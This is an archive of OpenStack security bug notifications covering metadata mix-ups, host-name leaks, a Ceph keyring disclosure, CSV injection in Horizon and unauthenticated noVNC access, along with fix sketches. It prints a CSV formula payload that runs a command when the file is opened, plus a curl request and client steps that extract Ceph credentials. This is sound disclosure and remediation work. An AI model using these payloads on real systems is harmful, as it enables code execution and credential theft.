From 1841933 at bugs.launchpad.net  Tue Nov 5 11:06:30 2019
From: 1841933 at bugs.launchpad.net (OpenStack Infra)
Date: Tue, 05 Nov 2019 11:06:30 -0000
Subject: [Openstack-security] [Bug 1841933] Re: Fetching metadata via LB may result with wrong instance data
References: <156708456800.5802.11171099222674714929.malonedeb@gac.canonical.com>
Message-ID: <157295199189.28669.6384001232669447033.launchpad@chaenomeles.canonical.com>

** Changed in: nova
     Assignee: Kobi Samoray (ksamoray) => Adit Sarfaty (asarfaty)

--
You received this bug notification because you are a member of OpenStack
Security SIG, which is subscribed to OpenStack.
https://bugs.launchpad.net/bugs/1841933

Title:
  Fetching metadata via LB may result with wrong instance data

Status in OpenStack Compute (nova):
  In Progress
Status in OpenStack Security Advisory:
  Won't Fix

Bug description:
  When metadata is queried from an instance via a load balancer, the
  metadata service relies on the X-Metadata-Provider header to identify
  the correct instance: it queries Neutron for the subnets attached to
  the load balancer, and the subnet result is then used to identify the
  instance by querying for ports attached to those subnets.

  However, when the first query result is empty (due to a deletion, a
  bug, or any other problem on the Neutron side), this becomes a
  security vulnerability: Neutron will retrieve ports of _any_ instance
  that has the same IP address as the instance being queried. That
  could compromise key pairs and other sensitive data.

To manage notifications about this bug go to:
https://bugs.launchpad.net/nova/+bug/1841933/+subscriptions
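[Editorial note: the failure mode above is easier to see in code. The
following is a minimal sketch, not the actual nova or vmware-nsx
implementation: find_lb_subnets and the metadata_provider field are
hypothetical stand-ins for the real Neutron queries. The point it
illustrates is that an empty subnet result has to abort the lookup;
otherwise the port query loses its subnet constraint and matches on IP
address alone.]

    def find_lb_subnets(neutron, provider_id):
        # Hypothetical stand-in: map the load balancer named by the
        # X-Metadata-Provider header to the subnets attached to it.
        return [s['id'] for s in neutron.list_subnets()['subnets']
                if s.get('metadata_provider') == provider_id]


    def lookup_instance_port(neutron, provider_id, instance_ip):
        subnet_ids = find_lb_subnets(neutron, provider_id)

        # Hardened behaviour: no subnets means no answer, full stop.
        if not subnet_ids:
            raise LookupError('no subnets for metadata provider %s'
                              % provider_id)

        # Constrained port query: only ports on those subnets may match.
        # Without the guard above, an empty subnet list would drop the
        # subnet_id constraint, and the query could return the port of
        # *any* tenant's instance that reuses the same fixed IP.
        fixed_ips = ['subnet_id=%s' % sid for sid in subnet_ids]
        fixed_ips.append('ip_address=%s' % instance_ip)
        ports = neutron.list_ports(fixed_ips=fixed_ips)['ports']
        return ports[0] if ports else None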
From smooney at redhat.com  Thu Nov 7 18:47:36 2019
From: smooney at redhat.com (sean mooney)
Date: Thu, 07 Nov 2019 18:47:36 -0000
Subject: [Openstack-security] [Bug 1851587] Re: HypervisorUnavailable error leaks compute host fqdn to non-admin users
References: <157308280286.2833.4356246734465945672.malonedeb@gac.canonical.com>
Message-ID: <157315245699.28442.3927898175786111811.malone@chaenomeles.canonical.com>

Did we not just fix a CVE that was very similar to this, where we were
passing exceptions back when we failed to connect to ceph, leaking the
ceph mon info? Granted, that is only available in the attachment
details, but this feels similar in that we are exposing the compute
node FQDN.

** Tags added: security

** Information type changed from Public to Public Security

--
You received this bug notification because you are a member of OpenStack
Security SIG, which is subscribed to OpenStack.
https://bugs.launchpad.net/bugs/1851587

Title:
  HypervisorUnavailable error leaks compute host fqdn to non-admin users

Status in OpenStack Compute (nova):
  New

Bug description:
  Description
  ===========
  When an instance encounters a HypervisorUnavailable error, a
  non-admin user sees the compute host FQDN in the error message.

  Steps to reproduce
  ==================
  1. Spin up an instance with non-admin user credentials
  2. To reproduce the error, stop the libvirtd service on the compute
     host containing the instance
  3. Delete the instance
  4. Deletion fails with a HypervisorUnavailable error

  Expected result
  ===============
  The error does not show the compute host FQDN to a non-admin user.

  Actual result
  =============
  #spin up an instance
  +--------------------------------------+------------+--------+------------+-------------+-------------------------------------+------------------------------+--------------------------------------+-------------+-----------+-------------------+------+------------+
  | ID                                   | Name       | Status | Task State | Power State | Networks                            | Image Name                   | Image ID                             | Flavor Name | Flavor ID | Availability Zone | Host | Properties |
  +--------------------------------------+------------+--------+------------+-------------+-------------------------------------+------------------------------+--------------------------------------+-------------+-----------+-------------------+------+------------+
  | 4f42886d-e1f8-4607-a09d-0dc12a681880 | test-11869 | ACTIVE | None       | Running     | private=192.168.100.158, 10.0.0.243 | cirros-0.4.0-x86_64-disk.img | 5d0bd6a5-7331-4ebe-9328-d126189897e2 |             |           | nova              |      |            |
  +--------------------------------------+------------+--------+------------+-------------+-------------------------------------+------------------------------+--------------------------------------+-------------+-----------+-------------------+------+------------+

  #instance is running on compute-0 node (only admin knows this)
  [heat-admin@compute-0 ~]$ sudo virsh list --all
   Id    Name                           State
  ----------------------------------------------------
   108   instance-00000092              running

  #stop libvirtd service
  [root@compute-0 heat-admin]# systemctl stop tripleo_nova_libvirt.service
  [root@compute-0 heat-admin]# systemctl status tripleo_nova_libvirt.service
  ● tripleo_nova_libvirt.service - nova_libvirt container
     Loaded: loaded (/etc/systemd/system/tripleo_nova_libvirt.service; enabled; vendor preset: disabled)
     Active: inactive (dead) since Wed 2019-11-06 22:48:25 UTC; 5s ago
    Process: 8514 ExecStop=/usr/bin/podman stop -t 10 nova_libvirt (code=exited, status=0/SUCCESS)
   Main PID: 3783
  Nov 06 22:29:48 compute-0 podman[3396]: 2019-11-06 22:29:48.443603571 +0000 UTC m=+1.325620613 container init a3e32121d12929e663b899b57cb7bc87581ddf5bdfb19cf8fee4bace41cb19bb (image=undercloud-0.ctlpla>
  Nov 06 22:29:48 compute-0 podman[3396]: 2019-11-06 22:29:48.475946808 +0000 UTC m=+1.357963869 container start a3e32121d12929e663b899b57cb7bc87581ddf5bdfb19cf8fee4bace41cb19bb (image=undercloud-0.ctlpl>
  Nov 06 22:29:48 compute-0 paunch-start-podman-container[3385]: nova_libvirt
  Nov 06 22:29:48 compute-0 paunch-start-podman-container[3385]: Creating additional drop-in dependency for "nova_libvirt" (a3e32121d12929e663b899b57cb7bc87581ddf5bdfb19cf8fee4bace41cb19bb)
  Nov 06 22:29:49 compute-0 systemd[1]: Started nova_libvirt container.
  Nov 06 22:48:24 compute-0 systemd[1]: Stopping nova_libvirt container...
  Nov 06 22:48:25 compute-0 podman[8514]: 2019-11-06 22:48:25.595405651 +0000 UTC m=+1.063832024 container died a3e32121d12929e663b899b57cb7bc87581ddf5bdfb19cf8fee4bace41cb19bb (image=undercloud-0.ctlpla>
  Nov 06 22:48:25 compute-0 podman[8514]: 2019-11-06 22:48:25.597210594 +0000 UTC m=+1.065636903 container stop a3e32121d12929e663b899b57cb7bc87581ddf5bdfb19cf8fee4bace41cb19bb (image=undercloud-0.ctlpla>
  Nov 06 22:48:25 compute-0 podman[8514]: a3e32121d12929e663b899b57cb7bc87581ddf5bdfb19cf8fee4bace41cb19bb
  Nov 06 22:48:25 compute-0 systemd[1]: Stopped nova_libvirt container.
  #delete the instance, it leaks the compute host fqdn to the non-admin user
  (overcloud) [stack@undercloud-0 ~]$ nova delete test-11869
  Request to delete server test-11869 has been accepted.

  (overcloud) [stack@undercloud-0 ~]$ openstack server list --long
  +--------------------------------------+------------+--------+------------+-------------+----------+------------------------------+--------------------------------------+-------------+-----------+-------------------+------+------------+
  | ID                                   | Name       | Status | Task State | Power State | Networks | Image Name                   | Image ID                             | Flavor Name | Flavor ID | Availability Zone | Host | Properties |
  +--------------------------------------+------------+--------+------------+-------------+----------+------------------------------+--------------------------------------+-------------+-----------+-------------------+------+------------+
  | 4f42886d-e1f8-4607-a09d-0dc12a681880 | test-11869 | ERROR  | None       | Running     |          | cirros-0.4.0-x86_64-disk.img | 5d0bd6a5-7331-4ebe-9328-d126189897e2 |             |           | nova              |      |            |
  +--------------------------------------+------------+--------+------------+-------------+----------+------------------------------+--------------------------------------+-------------+-----------+-------------------+------+------------+

  (overcloud) [stack@undercloud-0 ~]$ openstack server show test-11869   <---debug output attached in logs
  +-----------------------------+---------------------------------------------------------------------------------------------------------------------------------------+
  | Field                       | Value |
  +-----------------------------+---------------------------------------------------------------------------------------------------------------------------------------+
  | OS-DCF:diskConfig           | MANUAL |
  | OS-EXT-AZ:availability_zone | nova |
  | OS-EXT-STS:power_state      | Running |
  | OS-EXT-STS:task_state       | None |
  | OS-EXT-STS:vm_state         | error |
  | OS-SRV-USG:launched_at      | 2019-11-06T22:13:08.000000 |
  | OS-SRV-USG:terminated_at    | None |
  | accessIPv4                  | |
  | accessIPv6                  | |
  | addresses                   | |
  | config_drive                | |
  | created                     | 2019-11-06T22:12:57Z |
  | description                 | None |
  | fault                       | {'code': 500, 'created': '2019-11-06T23:01:45Z', 'message': 'Connection to the hypervisor is broken on host: compute-0.redhat.local'} |
  | flavor                      | disk='1', ephemeral='0', , original_name='m1.tiny', ram='512', swap='0', vcpus='1' |
  | hostId                      | c7e6bf58b57f435659bb0aa9637c7f830f776ec202a0d6e430ee3168 |
  | id                          | 4f42886d-e1f8-4607-a09d-0dc12a681880 |
  | image                       | cirros-0.4.0-x86_64-disk.img (5d0bd6a5-7331-4ebe-9328-d126189897e2) |
  | key_name                    | None |
  | locked                      | False |
  | locked_reason               | None |
  | name                        | test-11869 |
  | project_id                  | 6e39619e17a9478580c93120e1cb16bc |
  | properties                  | |
  | server_groups               | [] |
  | status                      | ERROR |
  | tags                        | [] |
  | trusted_image_certificates  | None |
  | updated                     | 2019-11-06T23:01:45Z |
  | user_id                     | 3cd6a8cb88eb49d3a84f9e67d89df598 |
  | volumes_attached            | |
  +-----------------------------+---------------------------------------------------------------------------------------------------------------------------------------+

To manage notifications about this bug go to:
https://bugs.launchpad.net/nova/+bug/1851587/+subscriptions

From 1851587 at bugs.launchpad.net  Thu Nov 7 18:57:40 2019
From: 1851587 at bugs.launchpad.net (Archit Modi)
Date: Thu, 07 Nov 2019 18:57:40 -0000
Subject: [Openstack-security] [Bug 1851587] Re: HypervisorUnavailable error leaks compute host fqdn to non-admin users
References: <157308280286.2833.4356246734465945672.malonedeb@gac.canonical.com>
Message-ID: <157315306057.3468.10650597284654450566.malone@gac.canonical.com>

This was found during validation of that CVE, and we discussed tracking
this issue separately rather than treating it as a CVE.

--
You received this bug notification because you are a member of OpenStack
Security SIG, which is subscribed to OpenStack.
https://bugs.launchpad.net/bugs/1851587

Title:
  HypervisorUnavailable error leaks compute host fqdn to non-admin users

Status in OpenStack Compute (nova):
  New

To manage notifications about this bug go to:
https://bugs.launchpad.net/nova/+bug/1851587/+subscriptions

From 1851587 at bugs.launchpad.net  Thu Nov 7 19:16:33 2019
From: 1851587 at bugs.launchpad.net (melanie witt)
Date: Thu, 07 Nov 2019 19:16:33 -0000
Subject: [Openstack-security] [Bug 1851587] Re: HypervisorUnavailable error leaks compute host fqdn to non-admin users
References: <157308280286.2833.4356246734465945672.malonedeb@gac.canonical.com>
Message-ID: <157315419353.19587.14586136077430577119.malone@wampee.canonical.com>

Yup, what Archit said. To be a bit more verbose, the original CVE was
about leaking the ceph monitor IP address, and while we were verifying
the fix for the original CVE, we stopped libvirtd to cause a server
fault and reproduce the original bug. But stopping libvirtd resulted in
the "Connection to the hypervisor is broken" state, and we inadvertently
exposed the HypervisorUnavailable exception containing the compute host
FQDN. So Archit has followed up on that and written it up as a separate
issue.

--
You received this bug notification because you are a member of OpenStack
Security SIG, which is subscribed to OpenStack.
https://bugs.launchpad.net/bugs/1851587

Title:
  HypervisorUnavailable error leaks compute host fqdn to non-admin users

Status in OpenStack Compute (nova):
  New

To manage notifications about this bug go to:
https://bugs.launchpad.net/nova/+bug/1851587/+subscriptions

From fungi at yuggoth.org  Fri Nov 8 04:44:30 2019
From: fungi at yuggoth.org (Jeremy Stanley)
Date: Fri, 08 Nov 2019 04:44:30 -0000
Subject: [Openstack-security] [Bug 1851587] Re: HypervisorUnavailable error leaks compute host fqdn to non-admin users
References: <157308280286.2833.4356246734465945672.malonedeb@gac.canonical.com>
Message-ID: <157318827080.29920.7734012574667072030.malone@soybean.canonical.com>
Per bug 1837877 this can be treated as a hardening opportunity, but no
further advisory should be needed.

** Also affects: ossa
   Importance: Undecided
       Status: New

** Changed in: ossa
       Status: New => Won't Fix

** Information type changed from Public Security to Public

--
You received this bug notification because you are a member of OpenStack
Security SIG, which is subscribed to OpenStack.
https://bugs.launchpad.net/bugs/1851587

Title:
  HypervisorUnavailable error leaks compute host fqdn to non-admin users

Status in OpenStack Compute (nova):
  New
Status in OpenStack Security Advisory:
  Won't Fix

To manage notifications about this bug go to:
https://bugs.launchpad.net/nova/+bug/1851587/+subscriptions

From mriedem.os at gmail.com  Fri Nov 8 14:36:37 2019
From: mriedem.os at gmail.com (Matt Riedemann)
Date: Fri, 08 Nov 2019 14:36:37 -0000
Subject: [Openstack-security] [Bug 1851587] Re: HypervisorUnavailable error leaks compute host fqdn to non-admin users
References: <157308280286.2833.4356246734465945672.malonedeb@gac.canonical.com>
Message-ID: <157322379756.22036.12403441954132321400.malone@soybean.canonical.com>

From the fix for bug 1837877 https://review.opendev.org/#/c/674821/:

"Note that nova exceptions with a %(reason)s replacement variable could
potentially be leaking sensitive details as well but those would need
to be cleaned up on a case-by-case basis since we don't want to change
the behavior of all fault messages otherwise users might not see
information like NoValidHost when their server goes to ERROR status
during scheduling."

In this case HypervisorUnavailable is a NovaException, so it's treated
differently:

https://github.com/openstack/nova/blob/a90fe1951200ebd27fe74788c0a96c01104ac2cf/nova/exception.py#L508

As I said above, this could likely show up in fault messages in a lot
of places where the ComputeManager uses the wrap_instance_fault
decorator to inject a fault on exceptions getting raised, and in
anything that changes the instance status to ERROR, e.g. a failed
rebuild:

https://github.com/openstack/nova/blob/a90fe1951200ebd27fe74788c0a96c01104ac2cf/nova/compute/manager.py#L3061
https://github.com/openstack/nova/blob/a90fe1951200ebd27fe74788c0a96c01104ac2cf/nova/compute/manager.py#L3145

So one question is: do we need to start whitelisting certain
exceptions? And if we do, how? Because the API will always show the
message:

https://github.com/openstack/nova/blob/a90fe1951200ebd27fe74788c0a96c01104ac2cf/nova/api/openstack/compute/views/servers.py#L331

but only shows the details (traceback) for admins and non-500 (I guess,
that's weird) error cases:

https://github.com/openstack/nova/blob/a90fe1951200ebd27fe74788c0a96c01104ac2cf/nova/api/openstack/compute/views/servers.py#L341

When I was working on the CVE fix above, it was complicated to know,
from the point where we inject the fault, what should be shown based on
context.is_admin, because an admin could be rebuilding some non-admin's
server, so we can't really base things on that. If we only showed the
fault message in the API for admins in 500-code cases, then non-admin
users would no longer see NoValidHost.

Do we need to get so granular that we need to set an attribute on each
class of nova exception indicating whether its fault message can be
exposed to non-admins? That would be hard to maintain, I imagine, but
maybe it would just start with HypervisorUnavailable and we build on
that for other known types of nova exceptions that leak host details?
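[Editorial note: for illustration, here is a rough sketch of the
attribute idea. The safe_for_users flag and record_fault_message helper
are hypothetical and do not exist in nova; a real change would have to
be wired into wrap_instance_fault and the API views referenced above.]

    class NovaException(Exception):
        msg_fmt = 'An unknown exception occurred.'
        # Hypothetical flag: may this exception's message be shown
        # verbatim to non-admin users in the instance fault record?
        safe_for_users = True

        def __init__(self, **kwargs):
            super().__init__(self.msg_fmt % kwargs)


    class NoValidHost(NovaException):
        # Users need this one to understand scheduling failures.
        msg_fmt = 'No valid host was found. %(reason)s'


    class HypervisorUnavailable(NovaException):
        # Embeds the compute host FQDN, so keep it away from users.
        msg_fmt = 'Connection to the hypervisor is broken on host: %(host)s'
        safe_for_users = False


    def record_fault_message(exc):
        # Called where the fault is created (e.g. wrap_instance_fault).
        # The full message and traceback would still be stored for
        # admins; only the user-visible message is scrubbed, which
        # sidesteps the unreliable context.is_admin check at injection
        # time.
        if getattr(exc, 'safe_for_users', True):
            return str(exc)
        return 'Internal error. Contact your cloud operator for details.'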
--
You received this bug notification because you are a member of OpenStack
Security SIG, which is subscribed to OpenStack.
https://bugs.launchpad.net/bugs/1851587

Title:
  HypervisorUnavailable error leaks compute host fqdn to non-admin users

Status in OpenStack Compute (nova):
  New
Status in OpenStack Security Advisory:
  Won't Fix

To manage notifications about this bug go to:
https://bugs.launchpad.net/nova/+bug/1851587/+subscriptions

From 1851587 at bugs.launchpad.net  Wed Nov 13 01:20:34 2019
From: 1851587 at bugs.launchpad.net (melanie witt)
Date: Wed, 13 Nov 2019 01:20:34 -0000
Subject: [Openstack-security] [Bug 1851587] Re: HypervisorUnavailable error leaks compute host fqdn to non-admin users
References: <157308280286.2833.4356246734465945672.malonedeb@gac.canonical.com>
Message-ID: <157360803477.22813.14440925104285817040.malone@chaenomeles.canonical.com>

> Do we need to get so granular that we need to set an attribute on
> each class of nova exception indicating whether its fault message can
> be exposed to non-admins? That would be hard to maintain, I imagine,
> but maybe it would just start with HypervisorUnavailable and we build
> on that for other known types of nova exceptions that leak host
> details?

This sounds like the most reasonable idea to me, assuming we want/need
to keep the compute host FQDN in the exception message.

I had actually been thinking about the possibility of removing the FQDN
from the exception message for HypervisorUnavailable altogether. If an
admin sees HypervisorUnavailable, they can also easily see what host
the guest is on (the instance 'host' field), and thus know which
compute host has a broken connection. Just an idea.
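[Editorial note: the alternative is even smaller; a sketch, building on
the hypothetical NovaException base from the sketch above.]

    class HypervisorUnavailable(NovaException):
        # Before: 'Connection to the hypervisor is broken on host: %(host)s'
        # After: no FQDN. An admin can recover the host from the
        # instance's own 'host' field, so nothing actionable is lost.
        msg_fmt = 'Connection to the hypervisor is broken.'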
--
You received this bug notification because you are a member of OpenStack
Security SIG, which is subscribed to OpenStack.
https://bugs.launchpad.net/bugs/1851587

Title:
  HypervisorUnavailable error leaks compute host fqdn to non-admin users

Status in OpenStack Compute (nova):
  New
Status in OpenStack Security Advisory:
  Won't Fix

To manage notifications about this bug go to:
https://bugs.launchpad.net/nova/+bug/1851587/+subscriptions

From rosmaita.fossdev at gmail.com  Wed Nov 20 21:27:27 2019
From: rosmaita.fossdev at gmail.com (Brian Rosmaita)
Date: Wed, 20 Nov 2019 21:27:27 -0000
Subject: [Openstack-security] [Bug 1849624] Re: ceph backend, secret key leak
References: <157190672936.29164.18418741485624946377.malonedeb@soybean.canonical.com>
Message-ID: <157428525288.21411.15186668012809947570.launchpad@soybean.canonical.com>
** Changed in: ossn
       Status: In Progress => Fix Released

** Changed in: cinder
       Status: In Progress => Fix Committed

--
You received this bug notification because you are a member of OpenStack
Security SIG, which is subscribed to OpenStack.
https://bugs.launchpad.net/bugs/1849624

Title:
  ceph backend, secret key leak

Status in Cinder:
  Fix Committed
Status in OpenStack Security Advisory:
  Won't Fix
Status in OpenStack Security Notes:
  Fix Released

Bug description:
  Cinder + ceph backend, secret key leak

  Conditions: cinder + ceph backend + rbd_keyring_conf set in cinder
  config files

  As an authenticated simple user, create a cinder volume that ends up
  on a ceph backend. Then reuse the os-initialize_connection API call
  (used by nova-compute/cinder-backup to attach volumes locally to the
  host running the services):

  curl -g -i -X POST https:///v3/c495530af57611e9bc14bbaa251e1e96/volumes/7e59b91e-d426-4294-bfc5-dfdebcb21879/action \
      -H "Accept: application/json" \
      -H "Content-Type: application/json" \
      -H "OpenStack-API-Version: volume 3.15" \
      -H "X-Auth-Token: $TOKEN" \
      -d '{"os-initialize_connection": {"connector":{}}}'

  If you do not want to forge the HTTP request, the openstack clients
  and extensions may prove helpful. As root:

  apt-get install python3-oslo.privsep virtualenv python3-dev python3-os-brick gcc ceph-common
  virtualenv -p python3 venv_openstack
  source venv_openstack/bin/activate
  pip install python-openstackclient
  pip install python-cinderclient
  pip install os-brick
  pip install python-brick-cinderclient-ext
  cinder create vol 1
  cinder --debug local-attach 7e59b91e-d426-4294-bfc5-dfdebcb21879

  This leaks the ceph credentials for the whole ceph cluster, leaving
  anyone able to go through ceph ACLs to get access to all the volumes
  within the cluster.

  {
     "connection_info" : {
        "data" : {
           "access_mode" : "rw",
           "secret_uuid" : "SECRET_UUID",
           "cluster_name" : "ceph",
           "encrypted" : false,
           "auth_enabled" : true,
           "discard" : true,
           "qos_specs" : {
              "write_iops_sec" : "3050",
              "read_iops_sec" : "3050"
           },
           "keyring" : "SECRETFILETOHIDE",
           "ports" : [
              "6789",
              "6789",
              "6789"
           ],
           "name" : "volumes/volume-7e59b91e-d426-4294-bfc5-dfdebcb21879",
           "secret_type" : "ceph",
           "hosts" : [
              "ceph_host1",
              "ceph_host2",
              ...
           ],
           "volume_id" : "7e59b91e-d426-4294-bfc5-dfdebcb21879",
           "auth_username" : "cinder"
        },
        "driver_volume_type" : "rbd"
     }
  }

  Quick workaround:

  1. Remove the rbd_keyring_conf param from any cinder config file;
     this will mitigate the information disclosure.
  2. For cinder backups to still work, providers should instead deploy
     their ceph keyring secrets directly on cinder-backup hosts
     (/etc/cinder/.keyring.conf, to be confirmed).

  Note that nova-compute hosts should not be impacted by the change,
  because ceph secrets are expected to be stored in libvirt secrets
  already, thus making this keyring disclosure useless to them (to be
  confirmed; there may be other compute drivers that are impacted by
  this).
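[Editorial note: to illustrate the direction of the long-term proposals
that follow, here is a sketch of scrubbing the sensitive fields from a
driver's connection_info before returning it to an unprivileged caller.
The key names match the leaked payload above, but this is not the
actual cinder fix; the immediate guidance in OSSN-0085 is the
workaround just described.]

    SENSITIVE_KEYS = ('keyring', 'secret_uuid', 'auth_username')

    def scrub_connection_info(connection_info):
        """Return a copy of connection_info safe to hand to a plain user."""
        data = dict(connection_info.get('data', {}))
        for key in SENSITIVE_KEYS:
            # Drop the secret material entirely; the remaining fields
            # are the plain attach parameters.
            data.pop(key, None)
        return dict(connection_info, data=data)

Applied to the JSON above, scrub_connection_info() would remove
keyring, secret_uuid, and auth_username while leaving the rbd volume
name, ports, and hosts intact.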
  Quick code fix:

  Mandatory: revert this commit https://review.opendev.org/#/c/456672/
  Optional: revert this one https://review.opendev.org/#/c/465044/,
  harmless in itself, but pointless once the first one has been
  reverted.

  Long-term code fix proposals:

  The os-initialize_connection API call is meant to allow simple users
  to use cinder as block storage as a service, attaching volumes
  outside the scope of any virtual machines/nova. Thus, the information
  returned by this call should be enough for the caller to attach the
  volume, but it should not disclose anything that would allow the
  caller to do more than that.

  Since that is not possible at all with ceph (there is no tenant
  isolation within a ceph cluster), the cinder backend for ceph should
  not implement this route at all. There is indeed no reason for cinder
  to disclose anything here about the ceph cluster, including hosts and
  cluster IDs, if the attach is doomed to fail anyway for users missing
  the secret information.

  Then, any 'admin' service using this call to locally attach volumes
  (nova-compute, cinder-backup, ...) should be modified to:
  - check the caller's rw permissions on the requested volumes
  - escalate the request
  - go through a new admin API route, not this 'user' one

To manage notifications about this bug go to:
https://bugs.launchpad.net/cinder/+bug/1849624/+subscriptions

From 1842749 at bugs.launchpad.net  Thu Nov 21 10:24:49 2019
From: 1842749 at bugs.launchpad.net (OpenStack Infra)
Date: Thu, 21 Nov 2019 10:24:49 -0000
Subject: [Openstack-security] [Bug 1842749] Fix included in openstack/horizon 17.0.0
References: <156762575246.17155.15736064918343185075.malonedeb@gac.canonical.com>
Message-ID: <157433188938.31140.4842427477593320506.malone@wampee.canonical.com>

This issue was fixed in the openstack/horizon 17.0.0 release.

--
You received this bug notification because you are a member of OpenStack
Security SIG, which is subscribed to OpenStack.
https://bugs.launchpad.net/bugs/1842749

Title:
  CSV Injection Possible in Compute Usage History

Status in OpenStack Dashboard (Horizon):
  Fix Released
Status in OpenStack Security Advisory:
  Won't Fix

Bug description:
  Many spreadsheet programs, such as Excel, LibreOffice, and
  OpenOffice, will parse cells containing special metacharacters and
  treat them as formulas. These programs can open comma-separated
  values (CSV) files and treat them as spreadsheets. If an attacker can
  influence the contents of a CSV file, that can allow the attacker to
  inject code that executes when someone opens the file in a
  spreadsheet program.

  In the Compute Overview panel in Horizon, there is a section titled
  "Usage Summary" with a feature for downloading a CSV document of that
  usage summary. The contents of the CSV document include the names of
  the instances and other data points, such as their current state or
  how many resources they consume. An attacker could create an instance
  whose name begins with an equals sign ('=') or at sign ('@'); both
  are recognized by Excel as metacharacters introducing a formula. The
  attacker can create an instance name that includes a payload such as:

  =cmd|' /C calc'!A0

  This payload opens the calculator program when the resulting CSV is
  opened in Microsoft Excel on a Windows machine. An attacker could
  easily substitute another payload that runs arbitrary shell commands.
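[Editorial note: a common defense against this class of bug is to
escape any cell that begins with a formula metacharacter before the
CSV is written. The following sketch is illustrative only and is not
the patch that went into horizon.]

    import csv
    import io

    FORMULA_PREFIXES = ('=', '+', '-', '@')

    def escape_cell(value):
        """Prefix formula-looking cells so spreadsheets treat them as text."""
        text = str(value)
        if text.startswith(FORMULA_PREFIXES):
            return "'" + text
        return text

    def render_csv(rows):
        buf = io.StringIO()
        writer = csv.writer(buf)
        for row in rows:
            writer.writerow([escape_cell(cell) for cell in row])
        return buf.getvalue()

    # The payload from this report comes out neutralized: the first
    # cell of render_csv([["=cmd|' /C calc'!A0", "ACTIVE"]]) begins
    # with a leading apostrophe, which Excel renders as a literal
    # string rather than evaluating it as a formula.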
  To manage notifications about this bug go to:
  https://bugs.launchpad.net/horizon/+bug/1842749/+subscriptions

From rosmaita.fossdev at gmail.com Thu Nov 21 13:31:11 2019
From: rosmaita.fossdev at gmail.com (Brian Rosmaita)
Date: Thu, 21 Nov 2019 13:31:11 -0000
Subject: [Openstack-security] [Bug 1849624] Re: ceph backend, secret key leak
References: <157190672936.29164.18418741485624946377.malonedeb@soybean.canonical.com>
Message-ID: <157434307253.6262.6108347867955584940.malone@gac.canonical.com>

This actually hasn't merged yet. It's been approved but has been stuck
in the gate due to circumstances beyond Cinder's control.

** Changed in: cinder
   Status: Fix Committed => In Progress

-- 
You received this bug notification because you are a member of OpenStack
Security SIG, which is subscribed to OpenStack.
https://bugs.launchpad.net/bugs/1849624

Title:
  ceph backend, secret key leak

Status in Cinder: In Progress
Status in OpenStack Security Advisory: Won't Fix
Status in OpenStack Security Notes: Fix Released
  To manage notifications about this bug go to:
  https://bugs.launchpad.net/cinder/+bug/1849624/+subscriptions

From 1849624 at bugs.launchpad.net Thu Nov 21 18:32:10 2019
From: 1849624 at bugs.launchpad.net (OpenStack Infra)
Date: Thu, 21 Nov 2019 18:32:10 -0000
Subject: [Openstack-security] [Bug 1849624] Fix merged to cinder (master)
References: <157190672936.29164.18418741485624946377.malonedeb@soybean.canonical.com>
Message-ID: <157436113043.31496.4634121766406087333.malone@wampee.canonical.com>

Reviewed: https://review.opendev.org/692428
Committed: https://git.openstack.org/cgit/openstack/cinder/commit/?id=b3c68b777a53e78fb77b7af98952bcc7d97bb06f
Submitter: Zuul
Branch: master

commit b3c68b777a53e78fb77b7af98952bcc7d97bb06f
Author: Brian Rosmaita
Date: Thu Oct 31 14:17:19 2019 -0400

    Deprecate rbd_keyring_conf option

    This option presents a security risk; see OSSN-0085.

    Change-Id: I345a3b4bf3b328b0e547016f481518d252f734b9
    Partial-bug: #1849624
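For operators, the deprecated option lives in the cinder configuration.
A sketch of the kind of backend stanza affected; the section name,
driver, and paths here are illustrative (only rbd_keyring_conf itself
comes from the bug and the commit above):

  # cinder.conf (illustrative rbd backend section)
  [ceph]
  volume_driver = cinder.volume.drivers.rbd.RBDDriver
  rbd_pool = volumes
  rbd_user = cinder
  # Deprecated and unsafe: causes keyring contents to be shipped to
  # clients in os-initialize_connection responses. Remove it.
  # rbd_keyring_conf = /etc/ceph/ceph.client.cinder.keyring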
-- 
You received this bug notification because you are a member of OpenStack
Security SIG, which is subscribed to OpenStack.
https://bugs.launchpad.net/bugs/1849624

Title:
  ceph backend, secret key leak

Status in Cinder: In Progress
Status in OpenStack Security Advisory: Won't Fix
Status in OpenStack Security Notes: Fix Released
  To manage notifications about this bug go to:
  https://bugs.launchpad.net/cinder/+bug/1849624/+subscriptions

From rosmaita.fossdev at gmail.com Thu Nov 21 19:25:17 2019
From: rosmaita.fossdev at gmail.com (Brian Rosmaita)
Date: Thu, 21 Nov 2019 19:25:17 -0000
Subject: [Openstack-security] [Bug 1849624] Re: ceph backend, secret key leak
References: <157190672936.29164.18418741485624946377.malonedeb@soybean.canonical.com>
Message-ID: <157436431951.7162.5919083330767320950.launchpad@gac.canonical.com>

** Changed in: cinder
   Status: In Progress => Fix Committed

-- 
You received this bug notification because you are a member of OpenStack
Security SIG, which is subscribed to OpenStack.
https://bugs.launchpad.net/bugs/1849624

Title:
  ceph backend, secret key leak

Status in Cinder: Fix Committed
Status in OpenStack Security Advisory: Won't Fix
Status in OpenStack Security Notes: Fix Released
  To manage notifications about this bug go to:
  https://bugs.launchpad.net/cinder/+bug/1849624/+subscriptions

From guojy8993 at 163.com Tue Nov 26 01:27:32 2019
From: guojy8993 at 163.com (pandatt)
Date: Tue, 26 Nov 2019 01:27:32 -0000
Subject: [Openstack-security] [Bug 1447679] Re: service No-VNC (port 6080) doesn't require authentication
References: <20150423154044.13260.70404.malonedeb@chaenomeles.canonical.com>
Message-ID: <157473165244.21773.6160864257433818153.malone@soybean.canonical.com>

https://review.opendev.org/#/c/623120/
https://review.opendev.org/#/c/622336/

-- 
You received this bug notification because you are a member of OpenStack
Security SIG, which is subscribed to OpenStack.
https://bugs.launchpad.net/bugs/1447679

Title:
  service No-VNC (port 6080) doesn't require authentication

Status in OpenStack Compute (nova): Confirmed
Status in OpenStack Security Advisory: Won't Fix

Bug description:
  Reported via private E-mail from Anass ANNOUR:

  I found that the service No-VNC (port 6080) doesn't require
  authentication: if you know the URL (e.g.
  http://192.168.198.164:6080/vnc_auto.html?token=3640a3c8-ad10-45da-a523-18d3793ef8ec),
  you can access the machine from any other computer, without any
  authentication, before the token expires (or at the same time, while
  the user is still using the console).
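  The reviews linked above rework console token handling. As a rough
  illustration of the class of mitigation (expiring, single-use
  tokens), here is a minimal Python sketch; it is hypothetical and not
  nova's actual consoleauth implementation, and all names are made up:

  import time
  import uuid

  _tokens = {}      # hypothetical in-memory token store
  TOKEN_TTL = 600   # seconds a console token stays valid

  def issue_console_token(instance_id):
      token = str(uuid.uuid4())
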